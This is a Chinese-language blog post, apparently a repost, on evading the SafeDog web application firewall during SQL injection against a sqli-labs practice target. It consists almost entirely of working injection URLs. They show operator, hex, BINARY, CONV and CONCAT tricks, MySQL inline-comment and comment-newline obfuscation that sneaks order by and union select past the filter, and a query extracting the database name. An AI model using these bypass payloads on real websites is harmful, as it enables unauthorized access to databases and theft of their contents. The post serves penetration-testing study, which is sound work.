跟团队小伙伴一起日狗
安全狗不让基本运算符后跟数字字符串
特殊运算符绕
http://172.16.1.157/sql/Less-1/?id=1'and -1=-1 -- + 正常
http://172.16.1.157/sql/Less-1/?id=1'and -1=-2 -- + 不正常
http://172.16.1.157/sql/Less-1/?id=1'and ~1=~1 -- + 正常
http://172.16.1.157/sql/Less-1/?id=1'and ~1=~2 -- + 不正常16进制绕
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 <> 0x1-- + 正常
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 <> 0x0-- + 不正常
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 <=> 0x0-- + 正常
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 <=> 0x1-- + 不正常
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 xor 0x1-- + 正常
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 xor 0x0-- + 不正常BINARY绕
http://172.16.1.157/sql/Less-1/?id=1' and BINARY 1-- + 正常
http://172.16.1.157/sql/Less-1/?id=1' and BINARY 0-- + 不正常conv()函数绕
http://172.16.1.157/sql/Less-1/?id=1' and CONV(1,11,2)-- + 正常
http://172.16.1.157/sql/Less-1/?id=1' and CONV(0,11,2)-- + 不正常concat()函数绕
http://172.16.1.157/sql/Less-1/?id=1' and CONCAT(1)-- + 正常
http://172.16.1.157/sql/Less-1/?id=1' and CONCAT(0)-- + 不正常绕order by
内联
http://172.16.1.157/sql/Less-1/?id=1'/*!14440order by*/ 3 -- +注释换行
http://172.16.1.157/sql/Less-1/?id=1'order%23%0aby 3 -- +关键在于打乱union select
内联
http://172.16.1.157/sql/Less-1/?id=-1' /*!14440union*//*!14440select */1,2,3 -- +注释后跟垃圾字符换行
http://172.16.1.157/sql/Less-1/?id=-1'union%23hhh%0aselect 1,2,3--+union distinct | distinctrow | all
http://172.16.1.157/sql/Less-1/?id=-1' union distinct %23%0aselect 1,2,3 -- +
http://172.16.1.157/sql/Less-1/?id=-1' union distinctrow %23%0aselect 1,2,3 -- +
http://172.16.1.157/sql/Less-1/?id=-1' union all%23%0aselect 1,2,3 -- +接下来是查数据,我在这使用注释垃圾字符换行也就是%23a%0a的方法来绕,你可以用上面说的/*!14440*/内联
查数据库名
http://172.16.1.157/sql/Less-1/?id=-1' union %23chabug%0a select 1,database%23%0a(%0a),3 -- +查表名 安全狗4.0默认没开information_schema防护的时候可以过,开了information_schema防护之后绕不过去,哭唧唧
文章来源: http://xz.aliyun.com/t/6545
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh